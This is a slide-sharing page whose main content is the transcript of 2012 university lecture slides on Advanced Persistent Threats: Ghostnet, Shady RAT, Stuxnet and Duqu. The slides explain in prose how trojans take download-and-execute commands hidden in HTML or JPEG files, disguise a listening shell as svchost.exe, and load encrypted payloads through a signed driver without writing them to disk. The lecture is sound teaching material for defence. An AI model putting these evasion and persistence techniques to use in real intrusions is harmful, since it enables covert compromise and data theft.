Advanced Persistent Threats CS461/ECE422 Spring 2012.

Slides:

Advertisements

Similar presentations

Providing protection from potential security threats that exist for any internet-connected computer is termed e- security. It is important to be able to.

Advertisements

Thank you to IT Training at Indiana University Computer Malware.

By Hiranmayi Pai Neeraj Jain

 Application software consists of programs designed to make users more productive and/or assist with personal tasks.  Growth of internet simplified.

Computer viruses Hardware theft Software Theft Unauthorized access by hackers Information Theft Computer Crimes.

Dr. John P. Abraham Professor UTPA 2 – Systems Threats and Risks.

Trojan Horse Program Presented by : Lori Agrawal.

Computer Viruses.

Security strategy. What is security strategy? How an organisation plans to protect and respond to security attacks on their information technology assets.

1 Pertemuan 05 Malicious Software Matakuliah: H0242 / Keamanan Jaringan Tahun: 2006 Versi: 1.

Malicious Attacks. Introduction Commonly referred to as: malicious software/ “malware”, computer viruses Designed to enter computers without the owner’s.

Lesson 9-Securing a Network. Overview Identifying threats to the network security. Planning a secure network.

Chapter 9 Security Malware Defenses. Malware Can be used for a form of blackmail. Example: Encrypts files on victim disk, then displays message.

Guide to Operating System Security Chapter 2 Viruses, Worms, and Malicious Software.

 Discovered in June/July 2010  Targeted Siemens software and equipment running Microsoft Windows  First malware for SCADA systems to spy and subvert.

Botnets Uses, Prevention, and Examples. Background Robot Network Programs communicating over a network to complete a task Adapted new meaning in the security.

Henric Johnson1 Chapter 10 Malicious Software Henric Johnson Blekinge Institute of Technology, Sweden

eScan Total Security Suite with Cloud Security

MSIT 458 – The Chinchillas. Offense Overview Botnet taxonomies need to be updated constantly in order to remain “complete” and are only as good as their.

Stuxnet The first cyber weapon.

1 Chap 10 Malicious Software. 2 Viruses and ”Malicious Programs ” Computer “Viruses” and related programs have the ability to replicate themselves on.

Outline  Infections  1) r57 shell  2) rogue software  What Can We Do?  1) Seccheck  2) Virus total  3) Sandbox  Prevention  1) Personal Software.

Protecting Your Computer & Your Information

Cyber Crime Tanmay S Dikshit.

A sophisticated Malware Arpit Singh CPSC 420

APT29 HAMMERTOSS Jayakrishnan M.

Jonathan Baulch  A worm that spreads via USB drives  Exploits a previously unknown vulnerability in Windows  Trojan backdoor that looks for a specific.

Lecture 14 Page 1 CS 236 Online Worms Programs that seek to move from system to system –Making use of various vulnerabilities Other performs other malicious.

Virus and Antivirus Team members: - Muzaffar Malik - Kiran Karki.

1 Operating Systems Security. 2 Where Malware hides ? Autoexec.bat or autoexec.nt can start malware before windows start Config.sys, config.nt Autorun.inf.

CHAPTER 14 Viruses, Trojan Horses and Worms. INTRODUCTION Viruses, Trojan Horses and worm are malicious programs that can cause damage to information.

CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Malware.

Chapter 13 Understanding E-Security. 2 OBJECTIVES What are security concerns (examples)? What are two types of threats (client/server) Virus – Computer.

1 Higher Computing Topic 8: Supporting Software Updated

1 Chap 10 Virus. 2 Viruses and ”Malicious Programs ” Computer “Viruses” and related programs have the ability to replicate themselves on an ever increasing.

Chapter 10 Malicious software. Viruses and ” Malicious Programs Computer “ Viruses ” and related programs have the ability to replicate themselves on.

Types of Electronic Infection

Lessons from Stuxnet Matthew McNeill. Quick Overview Discovered in July 2011 Sophisticated worm - many zero-day exploits, Siemens programmable logic controller.

Denial of Service (DoS) DoS attacks are aggressive attacks on an individual computer or groups of computers with the intent to deny services to intended.

Computer Viruses and Worms By: Monika Gupta Monika Gupta.

Understanding Computer Viruses: What They Can Do, Why People Write Them and How to Defend Against Them Computer Hardware and Software Maintenance.

Malicious Software.

n Just as a human virus is passed from person from person, a computer virus is passed from computer to computer. n A virus can be attached to any file.

Computer virus Speaker : 蔡尚倫.  Introduction  Infection target  Infection techniques Outline.

Computer Security Threats CLICKTECHSOLUTION.COM. Computer Security Confidentiality –Data confidentiality –Privacy Integrity –Data integrity –System integrity.

Types of Computer Malware. The first macro virus was written for Microsoft Word and was discovered in August Today, there are thousands of macro.

NETWORK SECURITY Definitions and Preventions Toby Wilson.

Lecture 5 Rootkits Hoglund/Butler (Chapters 1-3).

Page 1 Viruses. Page 2 What Is a Virus A virus is basically a computer program that has been written to perform a specific set of tasks. Unfortunately,

 Mal icious soft ware  Programs that violate one (or more) of the IA pillars  Does not (generally) refer to unintentional program bugs that violate.

Virus Infections By: Lindsay Bowser. Introduction b What is a “virus”? b Brief history of viruses b Different types of infections b How they spread b.

MUHAMMAD GHAZI AIMAN BIN MOHD AIDI. DEFINITION  A computer virus is a malware program that, when executed, replicates by inserting copies of itself (possibly.

NEXT GENERATION ATTACKS & EXPLOIT MITIGATIONS TECHNIQUES ID No: 1071 Name: Karthik GK ID: College: Sathyabama university.

1 Botnets Group 28: Sean Caulfield and Fredrick Young ECE 4112 Internetwork Security Prof. Henry Owen.

Detected by, M.Nitin kumar ( ) Sagar kumar sahu ( )

Android and IOS Permissions Why are they here and what do they want from me?

R ANSOMWARE CAN ORIGINATE FROM A MALICIOUS WEBSITE THAT EXPLOITS A KNOWN VULNERABILITY, PHISHING CAMPAIGNS,

Created by the E-PoliceSlide 122 February, 2012 Dangers of s By Michael Kuc.

Cosc 4765 Antivirus Approaches. In a Perfect world The best solution to viruses and worms to prevent infected the system –Generally considered impossible.

Botnets A collection of compromised machines

CS 492/592: Malware

CYBER SECURITY...

Botnets A collection of compromised machines

NET 311 Information Security

Chap 10 Malicious Software.

Propagation, behavior, and countermeasures

UNIT 18 Data Security 1.

A Distributed DoS in Action

Chap 10 Malicious Software.

Presentation transcript:

Advanced Persistent Threats CS461/ECE422 Spring 2012

Traditional Malware Infect as many machines as possible – Non-discriminating Goal is the machine resources. – Less the information on the machine Use CPU resources – Sell DDoS abilities – Sell SPAM abilities Use machines for storage – Stash stolen or illicit information on infected machine Use network resources – Launch attacks or indirect through infected machines Even where information is the goal, the specific owner of the information is not important – Gather credit card numbers – Perform extra bank transactions

Advanced Persistent Threat (APT) Has been there all along. Just has gotten more attention recently Attacker is concerned with the specific target – Discriminating, narrow, focused attack – E.g., attacker wants to find specific information from a specific organization May perform some more generic infection techniques, but the ultimate goal is very specific

Successful APT Lower volume – Unlikely to be part of standard virus scanner/IDS signature base – Generally the ones that are discovered are not particularly interesting Evolving – Perhaps changing on each campaign Focused – Just being more secure than your neighbors may not be good enough

Tibet Ghostnet Discovered March 2009 Infection initiated via targeted infected s – Infected attachment installs Trojan – Trojan contacts control server and ways for commands One command installed Gh0st Rat which allows complete control on windows system

Shady RAT RAT = Remote Access Trojan Report released by McAffee in August 2011 – operation-shady-rat.pdf operation-shady-rat.pdf – Reviewed the logs of one CNC botnet staring from 2006 The botnet infiltrated many government and commercial organizations – Claimed sophisticated attack and targeted information gathering – Concretely identified 71 infiltrated organizations

How is the target computer infected? Send s to people at the target organization – Infected attachments, e.g. MS word, Excel, PDF, powerpoint – Victim opens infected attachment. Results extra code executing which installs a Trojan Trojan attempts to contact some hard codes sites – Generally html or jpeg which don’t arouse much attention from the firewall or other network defenses – Commands are encrypted in the comments of the html file or embedding in the jpeg using steganographic techniques. – Example commands Run: {URL/Filename} – Download and execute file Sleep:{number} – Sleep for specified time Info from Symantec review –

Using the machine once it’s infected Using the {IP Address}:{port} command the Trojan connects to the remote server – Copies cmd.exe to svchost.exe and launchs the new version of cmd shell to listen on the port Lots of instances of svchost run on a windows machine – This gives the attacker almost complete freedom to launch their attack from the infected machine Does not use very sophisticated techniques

Stuxnet Came to public attention June 2010 but in hindsight appeared in November 2008 – Symantec analysis response/whitepapers/w32_stuxnet_dossier.pdf response/whitepapers/w32_stuxnet_dossier.pdf Truly more sophisticated – Replicates via removable drives (jumping the air gap) – Also leverages SMB and printer spooling vulnerabilities plus much more – Sophisticated binary hiding and execution Targeting a specific industrial control system (a Siemens PLC). Ultimately rootkits that PLC. – Supposedly the code altered behavior of centrifuges in a subtle way. Enough to alter the results of the centrifuging, but not enough so the operator would notice right away.

W32.Duqu Probable evolution of the Stuxnet code base Reports released around October 2011 – Symantec report e/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf e/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf Still figuring out the original infection vectors – One appears to be a zero-day MS doc issue day-exploit day-exploit Infected execution starts through a registered device driver – Device driver loaded on system boot – Device driver is signed with a legitimately signed certificate, so it does not raise attention – The driver injects a main dll into services.exe – The main dll is encrypted on disk. The key is stored in the registry

Duqu loading Performs basic anti-debugging checks – Are debugging types of processes running? – Uninstall if it has been running for 36 days The next phase is loaded from an encrypted resource in the main dll – The resource is decrypted into memory – The new DLL is injected into a standard process such as explorer.exe The newly injected code is a payload loader – It gets information from CNC – It uses rootkit techniques to execute the payload bytes (load library) without ever writing the bytes to disk Ultimately, it appears that the malware installs infostealing software – Appears to exchange data via information embedded in jpeg files.